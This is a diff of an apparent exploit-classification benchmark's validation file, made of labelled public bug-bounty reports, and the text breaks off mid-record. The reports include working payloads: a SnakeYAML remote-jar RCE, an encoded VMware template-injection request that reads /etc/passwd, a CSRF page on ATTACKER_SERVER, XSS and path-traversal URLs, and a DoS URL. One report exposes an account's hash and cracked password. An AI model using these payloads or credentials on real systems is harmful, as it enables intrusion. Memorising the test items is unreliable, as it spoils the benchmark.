diff --git "a/benchmark/task1_exploit_clf/val.jsonl" "b/benchmark/task1_exploit_clf/val.jsonl" --- "a/benchmark/task1_exploit_clf/val.jsonl" +++ "b/benchmark/task1_exploit_clf/val.jsonl" @@ -1,440 +1,1400 @@ -{"id": "0841b7138c3094ea667a", "text": "[Information Disclosure] Able to detect if a user is FetLife supporter although this user hides their support badge in fetlife.com/conversations/{id} JSON response\n\nUserA is a FetLife supporter, he also hides his support badge in his account privacy setting so that people don't know he is a supporter. However, UserB can start a conversation with userA, and by looking at `is_supporter` field in JSON response of their conversation . UserB knows that UserA is a FetLife supporter.\n\nUserB get the following information of userA by requesting `fetlife.com/conversations/{userA-userB-conversation-id}`\n```\n\"with_users\":\n[\n {\n \"id\": {id},\n \"nickname\": \"userA\",\n \"is_supporter\": true,\n \"show_badge\": false,\n \"identity\": \"30F Switch\",\n \"url\": \"/users/{id}\",\n \"avatar_url\": \"{avatar_url}\",\n \"role\": \"member\",\n \"starts_at\": 0,\n \"location\": \"Antarctica\"\n }\n]\n```\n\nFull request and response: F1541333\n\n## Attack condition\nFor this attack to succeed, attacker needs to start a conversation with victim regardless of victim accepting conversation request or not. Therefore, this attack works with users who set their Inbox privacy settings to `Open`, `Kinky`,`Hardcore`\n\n## Step to Reproduce\n1. Prepare 2 accounts, userA and userB. UserA is a FetLife supporter.\n2. UserB goes to userA profile and start a conversation with userA from there\n3. UserB goes to `https://fetlife.com/inbox`\n4. UserB open browser Developer tool and open conversation he just started.\n5. UserB looks at Network tab and find the request `fetlife.com/conversations/{userA-userB-conversation-id}` with JSON response\n6. UserB sees `is_supporter` field to check if userA is a supporter or not.\n\n## Impact\n\nAttacker can detect if a user is a FetLife supporter or not. This attack works on all users, except user with `strict` inbox privacy settings.", "source": "hackerone", "timestamp": "2022-02-11", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "d5e8fcc4ee211d9b7d70", "text": "[Cross-Site Request Forgery (CSRF)] Widespread CSRF on authenticated POST endpoints\n\n## Summary:\n\nCross-Site Request Forgery (CSRF) is possible on most, if not all, authenticated POST endpoints.\n\nWhile CORS is configured such that the Access-Control-Allow-Origin header is set to `Access-Control-Allow-Origin: hackers.upchieve.org`, CORS does **not** prevent CSRF - it only prevents the attacker from reading the response. This does not stop the attacker from performing any arbitrary actions on behalf of the user.\n\nThis is possible through a simple HTML form with hidden inputs, submitted with JavaScript. While POST requests are made using JSON data by default, `application/x-www-form-urlencoded` is accepted as well. Because the user's session cookie does not have the SameSite attribute set, it is sent along with the request.\n\nThe following endpoints were found to be vulnerable:\n- `POST /api/calendar/save` (set availability for text messages)\n- `POST /api/training/score` (submit quizzes and subject certifications)\n- `POST /auth/reset/send` (send password reset email)\n- `POST /api/user/volunteer-approval/background-information` (submit background information)\n- `POST /api/user/volunteer-approval/reference` (request a reference)\n\nThe attacker can perform any of the above actions on behalf of the user, as long as the user has a valid session cookie. There are probably more endpoints to be discovered, but I do not have access to them yet due to the approval / onboarding process.\n\nPUT requests, particularly `PUT /api/user` (to update a user's phone number and account status), are not possible through this method. However, older browsers might not comply to CORS pre-flight requests and still allow a PUT request initiated by JavaScript on the attacker's site to go through.\n\n## Steps To Reproduce:\n\n1. As a victim, log in to https://hackers.upchieve.org/\n2. Create a page like the one below.\n\nThis is an example for performing a CSRF on the `/api/calendar/save` endpoint (the full HTML file is attached). In this example, we set all the possible time slots to \"true\".\n\n```html\n\n \n
\n \n \n\t\t\n\t\t...\n\t\t\n \n \n
\n \n \n\n```\n\n3. Serve the page on the attacker server.\n4. As the victim, visit http://ATTACKER_SERVER/calendar_csrf.html\n\nOnce the HTML page loads on the browser, the POST request is submitted and we would see the following response:\n\n```json\n{\"msg\":\"Schedule saved\"}\n```\n\n5. Verify that the victim's calendar has been modified.\n\nI have also prepared other CSRF payloads for the other endpoints.\n\n- `calendar_csrf.html` performs the above-described attack.\n- `reference_csrf.html` sends out reference requests on behalf of the victim.\n- `quiz_csrf.html` submits quizzes for grading on behalf of the victim.\n- `reset_csrf` sends out password resets on behalf of the victim.\n\n## Supporting Material/References:\n\nI have attached the CSRF payloads, a screenshot of the changed calendar, and a screenshot of the output from the quiz CSRF.\n\n## Recommendations for Fixing/Mitigation\n\n- Use CSRF tokens\n- Use the SameSite attribute for cookies\n\n## Impact\n\nWhen an authenticated user visits any attacker-controlled site, the attacker is able to perform arbitrary authenticated actions on behalf of the user. While the attacker cannot obtain the request output from the CSRF, he is still able to perform sensitive actions blindly.", "source": "hackerone", "timestamp": "2022-02-13", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "e847354cd2dc4adee27d", "text": "[Code Injection] The `io.kubernetes.client.util.generic.dynamic.Dynamics` contains a code execution vulnerability due to SnakeYAML\n\n## Summary:\n\nIf the `io.kubernetes.client.util.generic.dynamic.Dynamics` is used to deserialize a `DynamicKubernetesObject `from untrusted YAML, an attacker can achieve code execution inside of the JVM.\n\nSince this is a part of the public API, down stream consumers can be using this API in a way that leaves them vulnerable. I have found no users of this class on GitHub outside of this project's unit tests. But that doesn't mean there are no users of this API. Someone built it for a reason, right?\n\n## Component Version:\n\nKubernettes Java Client version 17.0.0\n\n## Steps To Reproduce:\n\n1. Host a server with a JAR file containing the following code: \n```java\npackage org.jlleitschuh.sandbox;\n\nimport javax.script.ScriptEngine;\nimport javax.script.ScriptEngineFactory;\nimport java.io.IOException;\nimport java.util.List;\n\npublic class ScriptEngineFactoryRCE implements ScriptEngineFactory {\n static {\n try {\n Runtime r = Runtime.getRuntime();\n Process p = r.exec(\"open -a Calculator\");\n p.waitFor();\n } catch (IOException | InterruptedException e) {\n throw new RuntimeException(e);\n }\n }\n\n @Override\n public String getEngineName() {\n return null;\n }\n\n @Override\n public String getEngineVersion() {\n return null;\n }\n\n @Override\n public List getExtensions() {\n return null;\n }\n\n @Override\n public List getMimeTypes() {\n return null;\n }\n\n @Override\n public List getNames() {\n return null;\n }\n\n @Override\n public String getLanguageName() {\n return null;\n }\n\n @Override\n public String getLanguageVersion() {\n return null;\n }\n\n @Override\n public Object getParameter(String key) {\n return null;\n }\n\n @Override\n public String getMethodCallSyntax(String obj, String m, String... args) {\n return null;\n }\n\n @Override\n public String getOutputStatement(String toDisplay) {\n return null;\n }\n\n @Override\n public String getProgram(String... statements) {\n return null;\n }\n\n @Override\n public ScriptEngine getScriptEngine() {\n return null;\n }\n}\n```\n\nThe jar file must contain a file `/META-INF/services/javax.script.ScriptEngineFactory` with the contents `org.jlleitschuh.sandbox.ScriptEngineFactoryRCE # Our RCE Payload`\n\nHost this jar file from a local server's root path.\n\nThen call the `Dynamics` yaml parsing APIs with the following payload:\n\n```yaml\n!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:8080/\"]]]]\n```\n\n## Fix\n\nThe SnakeYAML parser should be instantiated with the argument `new SafeConstructor()` in order to not be vulnerable to arbitrary deserialization.\n\n## Supporting Material/References:\n - https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in (I'm currently attempting to convince the maintainer of SnakeYaml to make this library secure by default, with limited sucsess)\n - https://nvd.nist.gov/vuln/detail/CVE-2022-1471\n - https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2\n\n## Impact\n\nIf this Dynamics class is used to parse untrusted YAML, an attacker can achieve remote code execution", "source": "hackerone", "timestamp": "2023-04-25", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "cacf44032b3acfdee83b", "text": "[Improper Access Control - Generic] Adobe ColdFusion Access Control Bypass - CVE-2023-38205\n\n**Description:**\nHi team,\nThe subdomain https://████ is with adobe ColdFusion vulnerable with CVE-2023-38205.\nThis vulnerability is a bypass path created for CVE-2023-29298.\n\n## References\n\nhttps://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/\n\n## Impact\n\nIf an attacker accesses a URL path of /hax/..CFIDE/wizards/common/utils.cfc the access control can be bypassed and the expected endpoint can still be reached, even though it is not a valid URL path .\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2023-38205\n\n## Steps to Reproduce\n1. Go to: https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx\n2. See the remote method call wizardHash on the/CFIDE/wizards/common/utils.cfc endpoint.\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2023-12-21", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "f83412173e403051dc48", "text": "[Double Free] CVE-2022-42915: HTTP proxy double-free\n\nThis is a finding that Trail of Bits found in their ongoing curl security audit. Reported at a status meeting today.\n\n## Summary:\n\ncurl frees memory twice in some cleanup function related to HTTP proxies.\n\nIt as simple as `curl -x http://localhost:80 dict://127.0.0.1`\n\nUsing valgrind on the current git master, it shows:\n\n==55921== Memcheck, a memory error detector\n==55921== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al.\n==55921== Using Valgrind-3.19.0 and LibVEX; rerun with -h for copyright info\n==55921== Command: ./src/curl -x http://localhost:80 dict://127.0.0.1\n==55921== Parent PID: 3035\n==55921== \n==55921== Invalid free() / delete / delete[] / realloc()\n==55921== at 0x484617B: free (vg_replace_malloc.c:872)\n==55921== by 0x152464: curl_dbg_free (memdebug.c:297)\n==55921== by 0x17E11C: Curl_free_request_state (url.c:2259)\n==55921== by 0x179B38: Curl_close (url.c:421)\n==55921== by 0x1482DD: curl_easy_cleanup (easy.c:799)\n==55921== by 0x1359F4: post_per_transfer (tool_operate.c:657)\n==55921== by 0x13D085: serial_transfers (tool_operate.c:2431)\n==55921== by 0x13D5FC: run_all_transfers (tool_operate.c:2617)\n==55921== by 0x13D972: operate (tool_operate.c:2729)\n==55921== by 0x13427C: main (tool_main.c:276)\n==55921== Address 0x5b1c790 is 0 bytes inside a block of size 984 free'd\n==55921== at 0x484617B: free (vg_replace_malloc.c:872)\n==55921== by 0x152464: curl_dbg_free (memdebug.c:297)\n==55921== by 0x17AE5E: conn_free (url.c:810)\n==55921== by 0x17B132: Curl_disconnect (url.c:893)\n==55921== by 0x15D523: multi_runsingle (multi.c:2614)\n==55921== by 0x15D7B6: curl_multi_perform (multi.c:2683)\n==55921== by 0x147FFB: easy_transfer (easy.c:663)\n==55921== by 0x14822C: easy_perform (easy.c:753)\n==55921== by 0x148276: curl_easy_perform (easy.c:772)\n==55921== by 0x13D064: serial_transfers (tool_operate.c:2429)\n==55921== by 0x13D5FC: run_all_transfers (tool_operate.c:2617)\n==55921== by 0x13D972: operate (tool_operate.c:2729)\n==55921== Block was alloc'd at\n==55921== at 0x48485EF: calloc (vg_replace_malloc.c:1328)\n==55921== by 0x1521A6: curl_dbg_calloc (memdebug.c:175)\n==55921== by 0x1BEC8F: connect_init (http_proxy.c:174)\n==55921== by 0x1C02C2: Curl_proxyCONNECT (http_proxy.c:1061)\n==55921== by 0x1BEA43: Curl_proxy_connect (http_proxy.c:118)\n==55921== by 0x1B67D4: Curl_http_connect (http.c:1551)\n==55921== by 0x15C03A: multi_runsingle (multi.c:2027)\n==55921== by 0x15D7B6: curl_multi_perform (multi.c:2683)\n==55921== by 0x147FFB: easy_transfer (easy.c:663)\n==55921== by 0x14822C: easy_perform (easy.c:753)\n==55921== by 0x148276: curl_easy_perform (easy.c:772)\n==55921== by 0x13D064: serial_transfers (tool_operate.c:2429)\n==55921== \n==55921== \n==55921== HEAP SUMMARY:\n==55921== in use at exit: 0 bytes in 0 blocks\n==55921== total heap usage: 4,712 allocs, 4,713 frees, 893,816 bytes allocated\n==55921== \n==55921== All heap blocks were freed -- no leaks are possible\n==55921== \n==55921== For lists of detected and suppressed errors, rerun with: -s\n==55921== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)\n\n## Impact\n\nDouble-free is nasty", "source": "hackerone", "timestamp": "2022-11-26", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "d39b78db8500498a2d4f", "text": "[Cross-site Scripting (XSS) - DOM] DOM XSS through ads\n\nMultiple ads hosted on www.urbandictionary.com make the www.urbandictionary.com origin vulnerable to DOM XSS. Attached is an image of `alert(document.domain)` executing. The injection works in Firefox and Chrome.\n\nVisiting the following URL will **probably** cause an alert box displaying the document.domain as www.urbandictionary.com.\n`https://www.urbandictionary.com/define.php?term=#asdf'-alert(document.domain)-'asdf`\n\nI say \"probably\" because the exploit depends on the loading of certain ads. Doing this from a fresh browser session usually causes the alert box. If not refreshing the page a few times, allowing the page to fully load, usually causes the pop-up. It all depends on which ad loads.\n\nIt appears the `pwt.js` JavaScript file uses the `displayCreative` function to display a unique ad. This apparently is done by executing `document.write` in an anonymous function to write the ad into the the www.urbandictionary.com page. Visiting the above link will cause one of the ads to execute `document.domain` with a string that contains the following:\n\n```\n&page=1\n\npayload is:\">\n\n## Impact\n\nCan steal Cookie, Can run javascript code, and get information sensitive", "source": "hackerone", "timestamp": "2022-03-03", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "8a3952988a696665dd2d", "text": "[Improper Access Control - Generic] Federated editing allows iframing possibly malicious remotes\n\nSo this attack is less likely now that you killed the trusted server auto adding. But as far as I could tell you did not clear out old servers. Let me first describe the attack:\n\n1. UserA on ServerA sends a federated share to userB on serverB\n2. Assume serverA and serverB are trusted servers\n3. Now once the the trusted server is established when userB tries to edit the document it will do so on serverA. Hence the iframing\nhttps://github.com/nextcloud/richdocuments/blob/master/lib/AppInfo/Application.php#L239\n\n## Impact\n\nThe issue I see with this is that; not until to long ago it was trivial to establish trusted servers with federation (or from public links).\n\nThe second issue is that userB now not only has to trust serverB to be secure, properly updated etc. But also trusts implicitly serverA. ServerA could serve malicious code. That shows that the user needs to resubmit their password for example.\nThis is also not made clear on the settings to the admin that enabling trusted servers opens this possibility.\n\nNow. I admit that this is all not super likely to all happen. But iframing remote sources when clicking to edit a document (which the user will just expect to open their own collabora) poses a real risk I think.", "source": "hackerone", "timestamp": "2022-07-02", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "ad58fd318adbb3092135", "text": "[Code Injection] ███ vulnerable to CVE-2022-22954\n\nI found that one of the targets belongs to DOD vulnerable to CVE-2022-22954 where an attacker may be able to execute any malicious code like escalating Remote code execution is also possible \n\n**Technical Summary:**\n\nCVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager. This vulnerability was assigned a CVSSv3 score of 9.8. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw.\n\n**Vulnerable URL:**\n\n███=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d\n\n## Impact\n\nThe impact of server-side template injection vulnerabilities is generally critical, resulting in remote code execution by taking full control of the back-end server. Even without the code execution, the attacker may be able to read sensitive data on the server\n\n## System Host(s)\n██████, ████\n\n## Affected Product(s) and Version(s)\nVMware workspace one\n\n## CVE Numbers\nCVE-2022-22954\n\n## Steps to Reproduce\n* Run the following curl command \n\n**Command Used:**\n\ncurl -sk -X GET -H \"Host: ██████\" \"█████████=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d\"\n\n**Response:**\n\n```\n\n\n \n Error Page\n \n \n \n \n\n \n
\n
\n \n
\n
Request Failed
\n
\n

Please contact your IT Administrator.

\n Sign Out\n
\n
\n \n \n\n```\n\n* As you can see the above response, which contains the response of /etc/passwd in the response\n\n## Suggested Mitigation/Remediation Actions\nUpgrade the instances to the latest version", "source": "hackerone", "timestamp": "2022-04-20", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "3b43a71018b20f22526c", "text": "[Unknown] [JAVA]: Partial Path Traversal\n\nThis bug was reported directly to GitHub Security Lab.", "source": "hackerone", "timestamp": "2022-10-05", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "546e278cfc1de7c7b7e3", "text": "[Path Traversal] [CVE-2020-3452] Unauthenticated file read in Cisco ASA\n\nI found out that https://███/ was vulnerable to CVE-2020-3452.\n\nThe IP has a SSL certificate pointing to DoD.\n`curl -kv https://██████████/`\n\nOutput:\n```\nServer certificate:\n* subject: █████\n```\n\n## Impact\n\nAnyone can read any file present on the server.\n\n## System Host(s)\n████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nYou can test it by visiting the URL:\nhttps://██████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\nhttps://███████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86", "source": "hackerone", "timestamp": "2022-02-14", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "91626f1b90087abfee5c", "text": "[Improper Access Control - Generic] Broken access control, can lead to legitimate user data loss\n\nHi team,\nDuring testing the security of ██████████ I found another possible attack vector:\n(There are two reports preceding this one - https://hackerone.com/reports/1489470 and https://hackerone.com/reports/1489744)\n\nI will try to explain:\nWhen an user need access to that information system he fills a request form at:\nhttps://█████████/████████\nor\nhttps://█████████/██████\nAfter submitting the form the server response contains a █████████ which identifies this user request.\nThen the request is reviewed by an administrator, and he decides if user access will be granted or rejected.\nThe vulnerability I found is that unauthorized person can access the end point responsible for deleting user requests - █████████ and by providing just the ███ parameter he can delete any request.\n\n## References\n\n## Impact\n\nAn attacker can delete legitimate user requests, disturbing the normal operation of the system and causing data loss.\nThe user request ids are sequential numbers - my requests were given ids - ████████, so the attacker can delete all requests in the system by accessing the ████ end point with each ██████ from ██████████.\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\n██████████\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Activate Burp proxy, go to https://███/██████████, fill and submit the form (screenshot1)\n2. Inspect server response in Burp and take a note of the returned █████ (screenshot2) which is number, referencing this user access request\n3. (optional) we can confirm our request is in the system by performing the attack described in the other report I made (https://hackerone.com/reports/1489470) - resulting in our request being exfiltrated from the database:\nexecute following command, and replace the █████ parameter with the one you noted on step 2 (screenshot)\ncurl https://██████/██████████ -X POST -data=\"url=%2F████&██████████=████████\" -k\n\n4. Deleting the request - CAUTION - execute this step only by referencing ██████████ for requests, you made otherwise you will delete legitimate user request!(sceenshot4)\nthe command abusing the delete request endpoint is:\ncurl https://██████/███████████████ -X POST -data=\"url=%2F███████&███████=██████\" -k\n\n5. (optional) to confirm request is deleted you can execute again Step 3, which now responds with empty body - the request is no longer present in the database.\n\n## Suggested Mitigation/Remediation Actions\nThe ██████████ endpoint should perform check if the user is logged in and authorized to use it.", "source": "hackerone", "timestamp": "2022-04-07", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "3e040cb62cffcb785504", "text": "[Cross-site Scripting (XSS) - DOM] [CVE-2023-23913] DOM Based Cross-site Scripting in rails-ujs for contenteditable HTML Elements\n\n# Summary\nOriginal report: https://hackerone.com/reports/1767802\n\n## Impact\n\nIf the specified malicious HTML clipboard content is provided to a `contenteditable` element, this could result in the arbitrary execution of javascript on the origin in question.", "source": "hackerone", "timestamp": "2023-09-07", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "2b99cade015d32d2b443", "text": "[Cross-site Scripting (XSS) - DOM] Cross Site Scripting Vulnerability in fabric-sdk-py source code\n\nSee this fix on GitHub \nhttps://github.com/hyperledger/fabric-sdk-py/pull/175\n\n## Impact\n\nSome old affected versions of this package are vulnerable to Cross-site Scripting (XSS). Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.", "source": "hackerone", "timestamp": "2022-08-17", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "34b80070fb5e9ad0dd73", "text": "[Unknown] [Python]: CWE-079: HTTP Header injection\n\nThis bug was reported directly to GitHub Security Lab.", "source": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "e91557c46bb31467bd53", "text": "[Cross-site Scripting (XSS) - Generic] CVE-2022-23520: Incomplete fix for CVE-2022-32209 (XSS in Rails::Html::Sanitizer under certain configurations)\n\nThe following is from: https://hackerone.com/reports/1654310\n\nWhile building a PoC for CVE-2022-32209, I noticed that I could not fix my vulnerable application by updating https://github.com/rails/rails-html-sanitizer from 1.4.2 to 1.4.3 even though the Hackerone report about this vulnerability suggested that this should fix it (see here: https://hackerone.com/reports/1530898).\n\nI built this app with Rails 7.0.3.1 by just running \"rails new\", adding `config.action_view.sanitized_allowed_tags = [\"select\", \"style\"]` to the file `config/application.rb` and creating an endpoint that reflected a parameter after sanitizing it (ERB: `

Hello <%= sanitize @name %>

`). When using the payload `` for the parameter I got an alert no matter what the version of rails-html-sanitizer was.\n\nI believe the reason is the following. There are two ways you can pass the list of allowed tags to the sanitizer. One is via a list of tags stored in a class attribute, the other is via an argument passed into the `sanitize` method. The fix only considered the second way but the first one was forgotten. See the commit with the fix here: https://github.com/rails/rails-html-sanitizer/commit/c871aa4034d3d80ad67cf33a3462154b0a0fb477#diff-0daf33b9062eb5ccdeae86ed8bf2662a6e8669f1a7db590802b7f3b36ea47426R159\nThe relevant part of the code is this:\n\n```ruby\nmodule Rails\n module Html\n class SafeListSanitizer < Sanitizer\n ...\n def remove_safelist_tag_combinations(tags)\n if !loofah_using_html5? && tags.include?(\"select\") && tags.include?(\"style\")\n warn(\"WARNING: #{self.class}: removing 'style' from safelist, should not be combined with 'select'\")\n tags.delete(\"style\")\n end\n tags\n end\n\n def allowed_tags(options)\n if options[:tags]\n remove_safelist_tag_combinations(options[:tags])\n else\n self.class.allowed_tags\n end\n end\n ...\n end\n end\nend\n```\n\nMethod `remove_safelist_tag_combinations` is introduced to remove `style` from the allow list if `select` is in there. However, within method `allowed_tags` this cleanup is only applied to the tag list in the `options`, not to ` self.class.allowed_tags`, the list stored in the sanitizer class.\nHowever, it seems that the configuration in `config/application.rb` which I've set above put the list into the class variable (I've sprinkled a few `puts` here and there to confirm that).\n\nMoreover, when moving the allow list from `config/application.rb` into the ERB template\n(`

Hello <%= sanitize @name, tags: [\"select\", \"style\"] %>

`), the update from\n1.4.2 to 1.4.3 does fix the problem.\n\n## Impact\n\nIt is possible to bypass Rails::Html::SafeListSanitizer filtering and perform an XSS attack.", "source": "hackerone", "timestamp": "2023-01-04", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "587c011e2c6f6068dc2f", "text": "Osprey Pump Controller 1.0.1 Cross-Site Request Forgery\n\nSeverity: high", "source": "zeroscience", "timestamp": "2023-02-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "c7aec12fbdf94b2a1fc0", "text": "[Cross-site Scripting (XSS) - Stored] Stored xss at https://█.8x8.com/api/█/ID\n\n## Summary:\nhey , \ni found a stored xss at `https://██████.8x8.com/api/██████mentInfoById/ID` , when i analysis javascript code i understand user can modify her ip address with endpoint `https://███.8x8.com/api/patchPaymentMethod/ID` , next point i understand when we open `https://████████.8x8.com/api/██████████mentInfoById/ID` server set `Content-Type: text/html;charset=UTF-8` , this was interesting point , then i modify ip address with this request:\n```\nPOST /api/patchPaymentMethod/█████████ HTTP/2\nHost: ███.8x8.com\nCookie: ajs_anonymous_id=13b1ab4c-87f5-4dbb-967b-066b6d7efd1e; _gcl_au=1.1.275521026.1689699475; _fbp=fb.1.1689701587161.1730712436; __cf_bm=MloB4oUJmeviUXpE1GRUn8TtqbE4CwVEttuZr9tUrOQ-1689845706-0-AWJDz0q9F1c0CmKcbShEYyS7Qqsfd88Gb9W9YsIXUoHhnP/aHA+wGRccAnb8GxD1HBTGXJ71aHh7XzOojjLP/sg=\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: none\nSec-Fetch-User: ?1\nTe: trailers\nContent-Type: application/json\nContent-Length: 112\n\n{\n \"ipAddress\": \"\",\n\"callBackURL\":\"dssdsd\"\n }\n```\nnow i get response : \n```\nHTTP/2 400 Bad Request\nDate: Thu, 20 Jul 2023 23:30:32 GMT\nContent-Length: 0\nCache-Control: no-cache, no-store, max-age=0, must-revalidate\nExpires: 0\nPragma: no-cache\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains\nX-Content-Type-Options: nosniff\nX-Frame-Options: DENY\nX-Gk-Traceid: e97be98a-d5e6-4fce-a6a5-4d5f6d28b02a\nX-Regional-Id: usw2-gk-65dc71e19a79\nX-Served-Epoch: 1689895832189\nX-Xss-Protection: 1; mode=block\nCf-Cache-Status: DYNAMIC\nSet-Cookie: __cf_bm=7dklJH6I0nIayzUSs2ga_6bhxG_AZTclwDwaUIaKeBQ-1689895832-0-AQvIhwqEdRP3rLeIkHe1u4gqwspbam+/6s7/WEIOEsrvvvpuOSaaBNi36GsWEVNOGQWbRBz4Z89eCgjOTdOWGv0=; path=/; expires=Fri, 21-Jul-23 00:00:32 GMT; domain=.8x8.com; HttpOnly; Secure; SameSite=None\nServer: cloudflare\nCf-Ray: 7e9efe156adf41f9-EWR\n\n\n```\n\nthen i check url : https://█████████.8x8.com/api/██████████mentInfoById/████ \nand i seen ip address updated and █████load successfully executed : \n█████████\n \n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. open url : https://███.8x8.com/api/████mentInfoById/█████ \n 1. you can see my injected ████████load executed :D \n\n## Supporting Material/References:\n███\n\n## Impact\n\nStealing cookies and executed javascript in victim browser", "source": "hackerone", "timestamp": "2023-10-30", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "d7a623c0fe6abddc7619", "text": "[Insecure Storage of Sensitive Information] Exposure Of Admin Username & Password\n\nHello Team, \nTher an exposure of your username and password on this subdomain https://engage2.mtnonline.com/nc/\n\n\nExposed Credentials\n\n uid: \"mtnng\",\n passwd: \"bd31568138edbfc0552a1ecc6886ea5c\",\n\n\n\nSteps To Reproduce:\n\nVisit https://engage2.mtnonline.com/nc/ \n\nNow, press CTRL+U to view the source code of this page,\n\n\nLook for this code\n\n\n\n\n console.log(message);\n }\n}\n\n (function (){\n const plid = 73;\n\n const mtnContainer = document.getElementById(\"mtn20238\");\n const mtnUri = mtnContainer.childNodes[0].getAttribute(\"href\");\n mtnContainer.addEventListener(\"click\", ()=>fetch(mtnUri).catch(()=>{}));\n\n window.mobucksApi.placeAd({\n containerElementId: \"mtn20238\",\n uid: \"mtnng\",\n passwd: \"bd31568138edbfc0552a1ecc6886ea5c\",\n plid:plid,\n }, () => { \n typeof mtnNoBanner == \"function\" && mtnNoBanner(plid,mtnContainer);\n\n## Impact\n\nThe exposed password is in md5 which I was able to decrypt easily\n\nuid: mtnng\nhash = bd31568138edbfc0552a1ecc6886ea\nplain password: v0d@c0mS@\n\nAnd as an attacker, this can be abused in lots of ways such as exposing some client's info\n\nhttps://adsmobucks.mtnbusiness.com.ng/feed?uid=mtnng&passwd=bd31568138edbfc0552a1ecc6886ea5c&plid=8", "source": "hackerone", "timestamp": "2022-12-25", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "ecdcc4f4c1deac295a80", "text": "[Uncontrolled Resource Consumption] DoS at ████████ (CVE-2018-6389)\n\nHi DoD Team!\n\n##Description\n\nUnauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.\n\nThe vulnerability is registered as [CVE-2018-6389](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389).\n\nWordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. However, the number and size of files are not restricted in the process of loading JS files, attackers can use this function to deplete server resources and launch denial of service attacks.\n\n##Vulnerability\n\nhttps://███/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquer